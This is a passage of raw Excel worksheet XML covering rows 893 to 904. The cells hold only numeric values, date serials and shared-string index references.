      </c>
      <c r="X893">
        <v>0</v>
      </c>
      <c r="Y893">
        <v>0</v>
      </c>
      <c r="Z893">
        <v>0</v>
      </c>
      <c r="AA893">
        <v>0</v>
      </c>
      <c r="AB893">
        <v>200</v>
      </c>
      <c r="AC893">
        <v>0</v>
      </c>
      <c r="AD893">
        <v>0</v>
      </c>
      <c r="AE893">
        <v>0</v>
      </c>
      <c r="AF893" t="s">
        <v>6885</v>
      </c>
      <c r="AG893">
        <v>43364</v>
      </c>
      <c r="AH893">
        <v>13</v>
      </c>
      <c r="AJ893">
        <v>162</v>
      </c>
      <c r="AK893" t="s">
        <v>1109</v>
      </c>
      <c r="AL893" t="s">
        <v>1109</v>
      </c>
      <c r="AM893" t="s">
        <v>6886</v>
      </c>
      <c r="AN893" t="s">
        <v>55</v>
      </c>
      <c r="AO893">
        <v>2005</v>
      </c>
      <c r="AP893" t="s">
        <v>6887</v>
      </c>
      <c r="AQ893" t="s">
        <v>6888</v>
      </c>
      <c r="AR893" t="s">
        <v>6889</v>
      </c>
      <c r="AS893" t="s">
        <v>71</v>
      </c>
      <c r="AT893" t="s">
        <v>58</v>
      </c>
      <c r="AU893">
        <v>26</v>
      </c>
      <c r="AV893">
        <v>0</v>
      </c>
      <c r="AW893">
        <v>10</v>
      </c>
      <c r="AX893">
        <v>10</v>
      </c>
      <c r="AY893">
        <v>7</v>
      </c>
      <c r="AZ893">
        <v>3</v>
      </c>
      <c r="BA893" t="s">
        <v>16951</v>
      </c>
      <c r="BB893">
        <v>0</v>
      </c>
      <c r="BC893">
        <v>0</v>
      </c>
      <c r="BD893" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="894" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A894">
        <v>2750</v>
      </c>
      <c r="B894" t="s">
        <v>6890</v>
      </c>
      <c r="C894" t="s">
        <v>726</v>
      </c>
      <c r="D894" t="s">
        <v>6891</v>
      </c>
      <c r="E894" t="s">
        <v>944</v>
      </c>
      <c r="F894" t="s">
        <v>6892</v>
      </c>
      <c r="G894" s="1">
        <v>43923</v>
      </c>
      <c r="H894">
        <v>2975</v>
      </c>
      <c r="I894">
        <v>2975</v>
      </c>
      <c r="J894">
        <v>0</v>
      </c>
      <c r="K894">
        <v>0</v>
      </c>
      <c r="L894">
        <v>0</v>
      </c>
      <c r="M894">
        <v>0</v>
      </c>
      <c r="N894">
        <v>300</v>
      </c>
      <c r="O894">
        <v>0</v>
      </c>
      <c r="P894">
        <v>1</v>
      </c>
      <c r="Q894">
        <v>1</v>
      </c>
      <c r="R894">
        <v>1</v>
      </c>
      <c r="S894">
        <v>1</v>
      </c>
      <c r="T894">
        <v>1</v>
      </c>
      <c r="U894">
        <v>0</v>
      </c>
      <c r="V894">
        <v>0</v>
      </c>
      <c r="W894">
        <v>0</v>
      </c>
      <c r="X894">
        <v>0</v>
      </c>
      <c r="Y894">
        <v>0</v>
      </c>
      <c r="Z894">
        <v>0</v>
      </c>
      <c r="AA894">
        <v>2500</v>
      </c>
      <c r="AB894">
        <v>200</v>
      </c>
      <c r="AC894">
        <v>200</v>
      </c>
      <c r="AD894">
        <v>1</v>
      </c>
      <c r="AE894">
        <v>10000</v>
      </c>
      <c r="AF894" t="s">
        <v>6893</v>
      </c>
      <c r="AG894">
        <v>97718</v>
      </c>
      <c r="AH894">
        <v>32</v>
      </c>
      <c r="AJ894">
        <v>471</v>
      </c>
      <c r="AK894" t="s">
        <v>6894</v>
      </c>
      <c r="AL894" t="s">
        <v>6895</v>
      </c>
      <c r="AM894" t="s">
        <v>6896</v>
      </c>
      <c r="AN894" t="s">
        <v>68</v>
      </c>
      <c r="AO894">
        <v>2019</v>
      </c>
      <c r="AP894" t="s">
        <v>6897</v>
      </c>
      <c r="AQ894" t="s">
        <v>6898</v>
      </c>
      <c r="AR894" t="s">
        <v>6899</v>
      </c>
      <c r="AU894">
        <v>8</v>
      </c>
      <c r="AV894">
        <v>1</v>
      </c>
      <c r="AW894">
        <v>0</v>
      </c>
      <c r="AX894">
        <v>0</v>
      </c>
      <c r="AY894">
        <v>3</v>
      </c>
      <c r="AZ894">
        <v>5</v>
      </c>
      <c r="BA894" t="s">
        <v>17309</v>
      </c>
      <c r="BB894" t="s">
        <v>15913</v>
      </c>
      <c r="BC894" t="s">
        <v>10725</v>
      </c>
      <c r="BD894">
        <v>0</v>
      </c>
    </row>
    <row r="895" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A895">
        <v>2759</v>
      </c>
      <c r="B895" t="s">
        <v>327</v>
      </c>
      <c r="C895" t="s">
        <v>477</v>
      </c>
      <c r="D895" t="s">
        <v>6900</v>
      </c>
      <c r="E895" t="s">
        <v>300</v>
      </c>
      <c r="F895" t="s">
        <v>6901</v>
      </c>
      <c r="G895" s="1">
        <v>43930</v>
      </c>
      <c r="H895">
        <v>2987</v>
      </c>
      <c r="I895">
        <v>2987</v>
      </c>
      <c r="J895">
        <v>2</v>
      </c>
      <c r="K895">
        <v>1</v>
      </c>
      <c r="L895">
        <v>2</v>
      </c>
      <c r="M895">
        <v>0</v>
      </c>
      <c r="N895">
        <v>0</v>
      </c>
      <c r="O895">
        <v>0</v>
      </c>
      <c r="P895">
        <v>0</v>
      </c>
      <c r="Q895">
        <v>0</v>
      </c>
      <c r="R895">
        <v>18</v>
      </c>
      <c r="S895">
        <v>0</v>
      </c>
      <c r="T895">
        <v>0</v>
      </c>
      <c r="U895">
        <v>480000</v>
      </c>
      <c r="V895">
        <v>20000</v>
      </c>
      <c r="W895">
        <v>5000</v>
      </c>
      <c r="X895">
        <v>0</v>
      </c>
      <c r="Y895">
        <v>0</v>
      </c>
      <c r="Z895">
        <v>0</v>
      </c>
      <c r="AA895">
        <v>0</v>
      </c>
      <c r="AB895">
        <v>0</v>
      </c>
      <c r="AC895">
        <v>10000</v>
      </c>
      <c r="AD895">
        <v>0</v>
      </c>
      <c r="AE895">
        <v>0</v>
      </c>
      <c r="AF895" t="s">
        <v>330</v>
      </c>
      <c r="AG895">
        <v>95372</v>
      </c>
      <c r="AH895">
        <v>29</v>
      </c>
      <c r="AJ895">
        <v>376</v>
      </c>
      <c r="AK895" t="s">
        <v>5334</v>
      </c>
      <c r="AL895" t="s">
        <v>6902</v>
      </c>
      <c r="AM895" t="s">
        <v>6903</v>
      </c>
      <c r="AN895" t="s">
        <v>55</v>
      </c>
      <c r="AO895">
        <v>2009</v>
      </c>
      <c r="AP895" t="s">
        <v>6904</v>
      </c>
      <c r="AQ895" t="s">
        <v>6905</v>
      </c>
      <c r="AR895" t="s">
        <v>6906</v>
      </c>
      <c r="AS895" t="s">
        <v>371</v>
      </c>
      <c r="AT895" t="s">
        <v>72</v>
      </c>
      <c r="AU895">
        <v>25</v>
      </c>
      <c r="AV895">
        <v>1</v>
      </c>
      <c r="AW895">
        <v>56</v>
      </c>
      <c r="AX895">
        <v>75</v>
      </c>
      <c r="AY895">
        <v>13</v>
      </c>
      <c r="AZ895">
        <v>20</v>
      </c>
      <c r="BA895" t="s">
        <v>17165</v>
      </c>
      <c r="BB895">
        <v>0</v>
      </c>
      <c r="BC895">
        <v>0</v>
      </c>
      <c r="BD895" t="s">
        <v>10876</v>
      </c>
    </row>
    <row r="896" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A896">
        <v>2760</v>
      </c>
      <c r="B896" t="s">
        <v>6907</v>
      </c>
      <c r="C896" t="s">
        <v>157</v>
      </c>
      <c r="D896" t="s">
        <v>6908</v>
      </c>
      <c r="E896" t="s">
        <v>142</v>
      </c>
      <c r="F896" t="s">
        <v>143</v>
      </c>
      <c r="G896" s="1">
        <v>44050</v>
      </c>
      <c r="H896">
        <v>3009</v>
      </c>
      <c r="I896">
        <v>3009</v>
      </c>
      <c r="J896">
        <v>5</v>
      </c>
      <c r="K896">
        <v>0</v>
      </c>
      <c r="L896">
        <v>0</v>
      </c>
      <c r="M896">
        <v>0</v>
      </c>
      <c r="N896">
        <v>0</v>
      </c>
      <c r="O896">
        <v>0</v>
      </c>
      <c r="P896">
        <v>0</v>
      </c>
      <c r="Q896">
        <v>1</v>
      </c>
      <c r="R896">
        <v>2</v>
      </c>
      <c r="S896">
        <v>0</v>
      </c>
      <c r="T896">
        <v>1</v>
      </c>
      <c r="U896">
        <v>3000</v>
      </c>
      <c r="V896">
        <v>0</v>
      </c>
      <c r="W896">
        <v>0</v>
      </c>
      <c r="X896">
        <v>0</v>
      </c>
      <c r="Y896">
        <v>0</v>
      </c>
      <c r="Z896">
        <v>0</v>
      </c>
      <c r="AA896">
        <v>0</v>
      </c>
      <c r="AB896">
        <v>1000</v>
      </c>
      <c r="AC896">
        <v>2000</v>
      </c>
      <c r="AD896">
        <v>0</v>
      </c>
      <c r="AE896">
        <v>300</v>
      </c>
      <c r="AF896" t="s">
        <v>6909</v>
      </c>
      <c r="AG896">
        <v>66183</v>
      </c>
      <c r="AH896">
        <v>16</v>
      </c>
      <c r="AJ896">
        <v>232</v>
      </c>
      <c r="AK896" t="s">
        <v>6910</v>
      </c>
      <c r="AL896" t="s">
        <v>6911</v>
      </c>
      <c r="AM896" t="s">
        <v>6912</v>
      </c>
      <c r="AN896" t="s">
        <v>68</v>
      </c>
      <c r="AO896">
        <v>2013</v>
      </c>
      <c r="AP896" t="s">
        <v>6913</v>
      </c>
      <c r="AQ896" t="s">
        <v>6914</v>
      </c>
      <c r="AR896" t="s">
        <v>6909</v>
      </c>
      <c r="AU896">
        <v>25</v>
      </c>
      <c r="AV896">
        <v>1</v>
      </c>
      <c r="AW896">
        <v>2</v>
      </c>
      <c r="AX896">
        <v>4</v>
      </c>
      <c r="AY896">
        <v>2</v>
      </c>
      <c r="AZ896">
        <v>3</v>
      </c>
      <c r="BA896" t="s">
        <v>17313</v>
      </c>
      <c r="BB896">
        <v>0</v>
      </c>
      <c r="BC896" t="s">
        <v>10729</v>
      </c>
      <c r="BD896">
        <v>0</v>
      </c>
    </row>
    <row r="897" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A897">
        <v>2747</v>
      </c>
      <c r="B897" t="s">
        <v>6915</v>
      </c>
      <c r="C897" t="s">
        <v>477</v>
      </c>
      <c r="D897" t="s">
        <v>6916</v>
      </c>
      <c r="E897" t="s">
        <v>843</v>
      </c>
      <c r="F897" t="s">
        <v>6917</v>
      </c>
      <c r="G897" s="1">
        <v>43985</v>
      </c>
      <c r="H897">
        <v>3098</v>
      </c>
      <c r="I897">
        <v>3098</v>
      </c>
      <c r="J897">
        <v>0</v>
      </c>
      <c r="K897">
        <v>1</v>
      </c>
      <c r="L897">
        <v>0</v>
      </c>
      <c r="M897">
        <v>0</v>
      </c>
      <c r="N897">
        <v>0</v>
      </c>
      <c r="O897">
        <v>0</v>
      </c>
      <c r="P897">
        <v>0</v>
      </c>
      <c r="Q897">
        <v>0</v>
      </c>
      <c r="R897">
        <v>1</v>
      </c>
      <c r="S897">
        <v>0</v>
      </c>
      <c r="T897">
        <v>1</v>
      </c>
      <c r="U897">
        <v>0</v>
      </c>
      <c r="V897">
        <v>1000</v>
      </c>
      <c r="W897">
        <v>0</v>
      </c>
      <c r="X897">
        <v>0</v>
      </c>
      <c r="Y897">
        <v>0</v>
      </c>
      <c r="Z897">
        <v>0</v>
      </c>
      <c r="AA897">
        <v>0</v>
      </c>
      <c r="AB897">
        <v>0</v>
      </c>
      <c r="AC897">
        <v>2000</v>
      </c>
      <c r="AD897">
        <v>0</v>
      </c>
      <c r="AE897">
        <v>2000</v>
      </c>
      <c r="AF897" t="s">
        <v>6918</v>
      </c>
      <c r="AG897">
        <v>95516</v>
      </c>
      <c r="AH897">
        <v>29</v>
      </c>
      <c r="AJ897">
        <v>383</v>
      </c>
      <c r="AK897" t="s">
        <v>2026</v>
      </c>
      <c r="AL897" t="s">
        <v>6919</v>
      </c>
      <c r="AM897" t="s">
        <v>6920</v>
      </c>
      <c r="AN897" t="s">
        <v>55</v>
      </c>
      <c r="AO897">
        <v>2019</v>
      </c>
      <c r="AP897">
        <v>82291160427</v>
      </c>
      <c r="AQ897" t="s">
        <v>6921</v>
      </c>
      <c r="AR897" t="s">
        <v>6918</v>
      </c>
      <c r="AS897" t="s">
        <v>71</v>
      </c>
      <c r="AT897" t="s">
        <v>58</v>
      </c>
      <c r="AU897">
        <v>0</v>
      </c>
      <c r="AV897">
        <v>0</v>
      </c>
      <c r="AW897">
        <v>0</v>
      </c>
      <c r="AX897">
        <v>0</v>
      </c>
      <c r="AY897">
        <v>9</v>
      </c>
      <c r="AZ897">
        <v>5</v>
      </c>
      <c r="BA897" t="s">
        <v>17307</v>
      </c>
      <c r="BB897">
        <v>0</v>
      </c>
      <c r="BC897" t="s">
        <v>9485</v>
      </c>
      <c r="BD897" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="898" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A898">
        <v>2774</v>
      </c>
      <c r="B898" t="s">
        <v>6922</v>
      </c>
      <c r="C898" t="s">
        <v>157</v>
      </c>
      <c r="D898" t="s">
        <v>6923</v>
      </c>
      <c r="E898" t="s">
        <v>142</v>
      </c>
      <c r="F898" t="s">
        <v>666</v>
      </c>
      <c r="G898" s="1">
        <v>44090</v>
      </c>
      <c r="H898">
        <v>3111</v>
      </c>
      <c r="I898">
        <v>3111</v>
      </c>
      <c r="J898">
        <v>1</v>
      </c>
      <c r="K898">
        <v>0</v>
      </c>
      <c r="L898">
        <v>4</v>
      </c>
      <c r="M898">
        <v>0</v>
      </c>
      <c r="N898">
        <v>0</v>
      </c>
      <c r="O898">
        <v>0</v>
      </c>
      <c r="P898">
        <v>0</v>
      </c>
      <c r="Q898">
        <v>2</v>
      </c>
      <c r="R898">
        <v>4</v>
      </c>
      <c r="S898">
        <v>0</v>
      </c>
      <c r="T898">
        <v>0</v>
      </c>
      <c r="U898">
        <v>200000</v>
      </c>
      <c r="V898">
        <v>0</v>
      </c>
      <c r="W898">
        <v>4000</v>
      </c>
      <c r="X898">
        <v>0</v>
      </c>
      <c r="Y898">
        <v>0</v>
      </c>
      <c r="Z898">
        <v>0</v>
      </c>
      <c r="AA898">
        <v>0</v>
      </c>
      <c r="AB898">
        <v>200</v>
      </c>
      <c r="AC898">
        <v>4000</v>
      </c>
      <c r="AD898">
        <v>0</v>
      </c>
      <c r="AE898">
        <v>0</v>
      </c>
      <c r="AF898" t="s">
        <v>977</v>
      </c>
      <c r="AG898">
        <v>66382</v>
      </c>
      <c r="AH898">
        <v>16</v>
      </c>
      <c r="AJ898">
        <v>230</v>
      </c>
      <c r="AK898" t="s">
        <v>2692</v>
      </c>
      <c r="AL898" t="s">
        <v>2693</v>
      </c>
      <c r="AM898" t="s">
        <v>6924</v>
      </c>
      <c r="AN898" t="s">
        <v>68</v>
      </c>
      <c r="AO898">
        <v>2015</v>
      </c>
      <c r="AP898">
        <v>81289839431</v>
      </c>
      <c r="AQ898" t="s">
        <v>981</v>
      </c>
      <c r="AR898" t="s">
        <v>977</v>
      </c>
      <c r="AS898" t="s">
        <v>71</v>
      </c>
      <c r="AT898" t="s">
        <v>72</v>
      </c>
      <c r="AU898">
        <v>26</v>
      </c>
      <c r="AV898">
        <v>1</v>
      </c>
      <c r="AW898">
        <v>5</v>
      </c>
      <c r="AX898">
        <v>15</v>
      </c>
      <c r="AY898">
        <v>2</v>
      </c>
      <c r="AZ898">
        <v>1</v>
      </c>
      <c r="BA898" t="s">
        <v>17318</v>
      </c>
      <c r="BB898" t="s">
        <v>15915</v>
      </c>
      <c r="BC898" t="s">
        <v>10767</v>
      </c>
      <c r="BD898">
        <v>0</v>
      </c>
    </row>
    <row r="899" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A899">
        <v>2777</v>
      </c>
      <c r="B899" t="s">
        <v>789</v>
      </c>
      <c r="C899" t="s">
        <v>99</v>
      </c>
      <c r="D899" t="s">
        <v>6925</v>
      </c>
      <c r="E899" t="s">
        <v>142</v>
      </c>
      <c r="F899" t="s">
        <v>6926</v>
      </c>
      <c r="G899" s="1">
        <v>43952</v>
      </c>
      <c r="H899">
        <v>3127</v>
      </c>
      <c r="I899">
        <v>3127</v>
      </c>
      <c r="J899">
        <v>5</v>
      </c>
      <c r="K899">
        <v>0</v>
      </c>
      <c r="L899">
        <v>1</v>
      </c>
      <c r="M899">
        <v>0</v>
      </c>
      <c r="N899">
        <v>0</v>
      </c>
      <c r="O899">
        <v>0</v>
      </c>
      <c r="P899">
        <v>0</v>
      </c>
      <c r="Q899">
        <v>0</v>
      </c>
      <c r="R899">
        <v>0</v>
      </c>
      <c r="S899">
        <v>0</v>
      </c>
      <c r="T899">
        <v>0</v>
      </c>
      <c r="U899">
        <v>800</v>
      </c>
      <c r="V899">
        <v>0</v>
      </c>
      <c r="W899">
        <v>15</v>
      </c>
      <c r="X899">
        <v>0</v>
      </c>
      <c r="Y899">
        <v>0</v>
      </c>
      <c r="Z899">
        <v>0</v>
      </c>
      <c r="AA899">
        <v>0</v>
      </c>
      <c r="AB899">
        <v>0</v>
      </c>
      <c r="AC899">
        <v>0</v>
      </c>
      <c r="AD899">
        <v>0</v>
      </c>
      <c r="AE899">
        <v>0</v>
      </c>
      <c r="AF899" t="s">
        <v>6927</v>
      </c>
      <c r="AG899">
        <v>14440</v>
      </c>
      <c r="AH899">
        <v>12</v>
      </c>
      <c r="AJ899">
        <v>160</v>
      </c>
      <c r="AK899" t="s">
        <v>114</v>
      </c>
      <c r="AL899" t="s">
        <v>114</v>
      </c>
      <c r="AM899" t="s">
        <v>6928</v>
      </c>
      <c r="AN899" t="s">
        <v>55</v>
      </c>
      <c r="AO899">
        <v>2016</v>
      </c>
      <c r="AP899" t="s">
        <v>6929</v>
      </c>
      <c r="AQ899" t="s">
        <v>6930</v>
      </c>
      <c r="AR899" t="s">
        <v>6931</v>
      </c>
      <c r="AS899" t="s">
        <v>71</v>
      </c>
      <c r="AT899" t="s">
        <v>58</v>
      </c>
      <c r="AU899">
        <v>25</v>
      </c>
      <c r="AV899">
        <v>1</v>
      </c>
      <c r="AW899">
        <v>20</v>
      </c>
      <c r="AX899">
        <v>0</v>
      </c>
      <c r="AY899">
        <v>2</v>
      </c>
      <c r="AZ899">
        <v>10</v>
      </c>
      <c r="BA899" t="s">
        <v>17321</v>
      </c>
      <c r="BB899" t="s">
        <v>14459</v>
      </c>
      <c r="BC899" t="s">
        <v>10771</v>
      </c>
      <c r="BD899" t="s">
        <v>10037</v>
      </c>
    </row>
    <row r="900" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A900">
        <v>2772</v>
      </c>
      <c r="B900" t="s">
        <v>4132</v>
      </c>
      <c r="C900" t="s">
        <v>157</v>
      </c>
      <c r="D900" t="s">
        <v>6932</v>
      </c>
      <c r="E900" t="s">
        <v>142</v>
      </c>
      <c r="F900" t="s">
        <v>6933</v>
      </c>
      <c r="G900" s="1">
        <v>44211</v>
      </c>
      <c r="H900">
        <v>3137</v>
      </c>
      <c r="I900">
        <v>3137</v>
      </c>
      <c r="J900">
        <v>3</v>
      </c>
      <c r="K900">
        <v>0</v>
      </c>
      <c r="L900">
        <v>0</v>
      </c>
      <c r="M900">
        <v>0</v>
      </c>
      <c r="N900">
        <v>0</v>
      </c>
      <c r="O900">
        <v>0</v>
      </c>
      <c r="P900">
        <v>0</v>
      </c>
      <c r="Q900">
        <v>0</v>
      </c>
      <c r="R900">
        <v>0</v>
      </c>
      <c r="S900">
        <v>0</v>
      </c>
      <c r="T900">
        <v>0</v>
      </c>
      <c r="U900">
        <v>600</v>
      </c>
      <c r="V900">
        <v>0</v>
      </c>
      <c r="W900">
        <v>0</v>
      </c>
      <c r="X900">
        <v>0</v>
      </c>
      <c r="Y900">
        <v>0</v>
      </c>
      <c r="Z900">
        <v>0</v>
      </c>
      <c r="AA900">
        <v>0</v>
      </c>
      <c r="AB900">
        <v>0</v>
      </c>
      <c r="AC900">
        <v>0</v>
      </c>
      <c r="AD900">
        <v>0</v>
      </c>
      <c r="AE900">
        <v>0</v>
      </c>
      <c r="AF900" t="s">
        <v>6934</v>
      </c>
      <c r="AG900">
        <v>61217</v>
      </c>
      <c r="AH900">
        <v>16</v>
      </c>
      <c r="AJ900">
        <v>242</v>
      </c>
      <c r="AK900" t="s">
        <v>1894</v>
      </c>
      <c r="AL900" t="s">
        <v>4337</v>
      </c>
      <c r="AM900" t="s">
        <v>6935</v>
      </c>
      <c r="AN900" t="s">
        <v>55</v>
      </c>
      <c r="AO900">
        <v>2020</v>
      </c>
      <c r="AP900">
        <v>81318881407</v>
      </c>
      <c r="AQ900">
        <v>81937733353</v>
      </c>
      <c r="AR900" t="s">
        <v>6934</v>
      </c>
      <c r="AS900" t="s">
        <v>71</v>
      </c>
      <c r="AT900" t="s">
        <v>58</v>
      </c>
      <c r="AU900">
        <v>26</v>
      </c>
      <c r="AV900">
        <v>0</v>
      </c>
      <c r="AW900">
        <v>6</v>
      </c>
      <c r="AX900">
        <v>0</v>
      </c>
      <c r="AY900">
        <v>3</v>
      </c>
      <c r="AZ900">
        <v>1</v>
      </c>
      <c r="BA900" t="s">
        <v>16849</v>
      </c>
      <c r="BB900" t="s">
        <v>15917</v>
      </c>
      <c r="BC900" t="s">
        <v>10888</v>
      </c>
      <c r="BD900" t="s">
        <v>10889</v>
      </c>
    </row>
    <row r="901" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A901">
        <v>2718</v>
      </c>
      <c r="B901" t="s">
        <v>6936</v>
      </c>
      <c r="C901" t="s">
        <v>318</v>
      </c>
      <c r="D901" t="s">
        <v>6937</v>
      </c>
      <c r="E901" t="s">
        <v>843</v>
      </c>
      <c r="F901" t="s">
        <v>6938</v>
      </c>
      <c r="G901" s="1">
        <v>43921</v>
      </c>
      <c r="H901">
        <v>3185</v>
      </c>
      <c r="I901">
        <v>3185</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t="s">
        <v>6939</v>
      </c>
      <c r="AG901">
        <v>90552</v>
      </c>
      <c r="AH901">
        <v>26</v>
      </c>
      <c r="AJ901">
        <v>406</v>
      </c>
      <c r="AK901" t="s">
        <v>2394</v>
      </c>
      <c r="AL901" t="s">
        <v>6940</v>
      </c>
      <c r="AM901" t="s">
        <v>6941</v>
      </c>
      <c r="AN901" t="s">
        <v>68</v>
      </c>
      <c r="AO901">
        <v>2015</v>
      </c>
      <c r="AP901" t="s">
        <v>6942</v>
      </c>
      <c r="AQ901" t="s">
        <v>6943</v>
      </c>
      <c r="AR901" t="s">
        <v>6939</v>
      </c>
      <c r="AS901" t="s">
        <v>71</v>
      </c>
      <c r="AT901" t="s">
        <v>58</v>
      </c>
      <c r="AU901">
        <v>26</v>
      </c>
      <c r="AV901">
        <v>1</v>
      </c>
      <c r="AW901">
        <v>7</v>
      </c>
      <c r="AX901">
        <v>0</v>
      </c>
      <c r="AY901">
        <v>0</v>
      </c>
      <c r="AZ901">
        <v>3</v>
      </c>
      <c r="BA901" t="s">
        <v>17027</v>
      </c>
      <c r="BB901" t="s">
        <v>14777</v>
      </c>
      <c r="BC901">
        <v>0</v>
      </c>
      <c r="BD901" t="s">
        <v>10785</v>
      </c>
    </row>
    <row r="902" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A902">
        <v>2715</v>
      </c>
      <c r="B902" t="s">
        <v>6944</v>
      </c>
      <c r="C902" t="s">
        <v>2760</v>
      </c>
      <c r="D902" t="s">
        <v>6945</v>
      </c>
      <c r="E902" t="s">
        <v>142</v>
      </c>
      <c r="F902" t="s">
        <v>6946</v>
      </c>
      <c r="G902" s="1">
        <v>44116</v>
      </c>
      <c r="H902">
        <v>3194</v>
      </c>
      <c r="I902">
        <v>3194</v>
      </c>
      <c r="J902">
        <v>0</v>
      </c>
      <c r="K902">
        <v>1</v>
      </c>
      <c r="L902">
        <v>0</v>
      </c>
      <c r="M902">
        <v>0</v>
      </c>
      <c r="N902">
        <v>0</v>
      </c>
      <c r="O902">
        <v>0</v>
      </c>
      <c r="P902">
        <v>0</v>
      </c>
      <c r="Q902">
        <v>0</v>
      </c>
      <c r="R902">
        <v>0</v>
      </c>
      <c r="S902">
        <v>0</v>
      </c>
      <c r="T902">
        <v>0</v>
      </c>
      <c r="U902">
        <v>0</v>
      </c>
      <c r="V902">
        <v>25000</v>
      </c>
      <c r="W902">
        <v>0</v>
      </c>
      <c r="X902">
        <v>0</v>
      </c>
      <c r="Y902">
        <v>0</v>
      </c>
      <c r="Z902">
        <v>0</v>
      </c>
      <c r="AA902">
        <v>0</v>
      </c>
      <c r="AB902">
        <v>0</v>
      </c>
      <c r="AC902">
        <v>0</v>
      </c>
      <c r="AD902">
        <v>0</v>
      </c>
      <c r="AE902">
        <v>0</v>
      </c>
      <c r="AF902" t="s">
        <v>6947</v>
      </c>
      <c r="AG902">
        <v>83561</v>
      </c>
      <c r="AH902">
        <v>18</v>
      </c>
      <c r="AJ902">
        <v>284</v>
      </c>
      <c r="AK902" t="s">
        <v>6948</v>
      </c>
      <c r="AL902" t="s">
        <v>6949</v>
      </c>
      <c r="AM902" t="s">
        <v>6950</v>
      </c>
      <c r="AN902" t="s">
        <v>55</v>
      </c>
      <c r="AO902">
        <v>2019</v>
      </c>
      <c r="AP902" t="s">
        <v>6951</v>
      </c>
      <c r="AQ902" t="s">
        <v>6952</v>
      </c>
      <c r="AR902" t="s">
        <v>6947</v>
      </c>
      <c r="AS902" t="s">
        <v>71</v>
      </c>
      <c r="AT902" t="s">
        <v>58</v>
      </c>
      <c r="AU902">
        <v>25</v>
      </c>
      <c r="AV902">
        <v>0</v>
      </c>
      <c r="AW902">
        <v>0</v>
      </c>
      <c r="AX902">
        <v>0</v>
      </c>
      <c r="AY902">
        <v>2</v>
      </c>
      <c r="AZ902">
        <v>2</v>
      </c>
      <c r="BA902" t="s">
        <v>17292</v>
      </c>
      <c r="BB902">
        <v>0</v>
      </c>
      <c r="BC902" t="s">
        <v>11324</v>
      </c>
      <c r="BD902" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="903" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A903">
        <v>2761</v>
      </c>
      <c r="B903" t="s">
        <v>6953</v>
      </c>
      <c r="C903" t="s">
        <v>168</v>
      </c>
      <c r="D903" t="s">
        <v>6954</v>
      </c>
      <c r="E903" t="s">
        <v>809</v>
      </c>
      <c r="F903" t="s">
        <v>6955</v>
      </c>
      <c r="G903" s="1">
        <v>43998</v>
      </c>
      <c r="H903">
        <v>3232</v>
      </c>
      <c r="I903">
        <v>3232</v>
      </c>
      <c r="J903">
        <v>2</v>
      </c>
      <c r="K903">
        <v>1</v>
      </c>
      <c r="L903">
        <v>0</v>
      </c>
      <c r="M903">
        <v>0</v>
      </c>
      <c r="N903">
        <v>0</v>
      </c>
      <c r="O903">
        <v>0</v>
      </c>
      <c r="P903">
        <v>0</v>
      </c>
      <c r="Q903">
        <v>0</v>
      </c>
      <c r="R903">
        <v>0</v>
      </c>
      <c r="S903">
        <v>0</v>
      </c>
      <c r="T903">
        <v>0</v>
      </c>
      <c r="U903">
        <v>243750</v>
      </c>
      <c r="V903">
        <v>56250</v>
      </c>
      <c r="W903">
        <v>0</v>
      </c>
      <c r="X903">
        <v>0</v>
      </c>
      <c r="Y903">
        <v>0</v>
      </c>
      <c r="Z903">
        <v>0</v>
      </c>
      <c r="AA903">
        <v>0</v>
      </c>
      <c r="AB903">
        <v>0</v>
      </c>
      <c r="AC903">
        <v>0</v>
      </c>
      <c r="AD903">
        <v>0</v>
      </c>
      <c r="AE903">
        <v>0</v>
      </c>
      <c r="AF903" t="s">
        <v>6956</v>
      </c>
      <c r="AG903">
        <v>17211</v>
      </c>
      <c r="AH903">
        <v>13</v>
      </c>
      <c r="AJ903">
        <v>176</v>
      </c>
      <c r="AK903" t="s">
        <v>6957</v>
      </c>
      <c r="AL903" t="s">
        <v>6958</v>
      </c>
      <c r="AM903" t="s">
        <v>6959</v>
      </c>
      <c r="AN903" t="s">
        <v>55</v>
      </c>
      <c r="AO903">
        <v>2017</v>
      </c>
      <c r="AP903" t="s">
        <v>6960</v>
      </c>
      <c r="AQ903" t="s">
        <v>6961</v>
      </c>
      <c r="AR903" t="s">
        <v>6956</v>
      </c>
      <c r="AS903" t="s">
        <v>179</v>
      </c>
      <c r="AT903" t="s">
        <v>58</v>
      </c>
      <c r="AU903">
        <v>25</v>
      </c>
      <c r="AV903">
        <v>0</v>
      </c>
      <c r="AW903">
        <v>0</v>
      </c>
      <c r="AX903">
        <v>0</v>
      </c>
      <c r="AY903">
        <v>4</v>
      </c>
      <c r="AZ903">
        <v>2</v>
      </c>
      <c r="BA903" t="s">
        <v>17314</v>
      </c>
      <c r="BB903">
        <v>0</v>
      </c>
      <c r="BC903" t="s">
        <v>10829</v>
      </c>
      <c r="BD903">
        <v>0</v>
      </c>
    </row>
    <row r="904" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A904">
        <v>2769</v>
      </c>
      <c r="B904" t="s">
        <v>6962</v>
      </c>
      <c r="C904" t="s">
        <v>2060</v>
      </c>
      <c r="D904" t="s">
        <v>6963</v>
      </c>
      <c r="E904" t="s">
        <v>111</v>
      </c>
      <c r="F904" t="s">
        <v>6964</v>
      </c>
      <c r="G904" s="1">
        <v>43959</v>
      </c>
      <c r="H904">
        <v>3240</v>
      </c>
      <c r="I904">
        <v>3240</v>
      </c>
      <c r="J904">
        <v>2</v>
      </c>
      <c r="K904">
        <v>0</v>
      </c>
      <c r="L904">
        <v>2</v>
      </c>
      <c r="M904">
        <v>1</v>
      </c>
      <c r="N904">
        <v>0</v>
      </c>
      <c r="O904">
        <v>0</v>
      </c>
      <c r="P904">
        <v>0</v>
      </c>
      <c r="Q904">
        <v>3</v>
      </c>
      <c r="R904">
        <v>40</v>
      </c>
      <c r="S904">
        <v>0</v>
      </c>
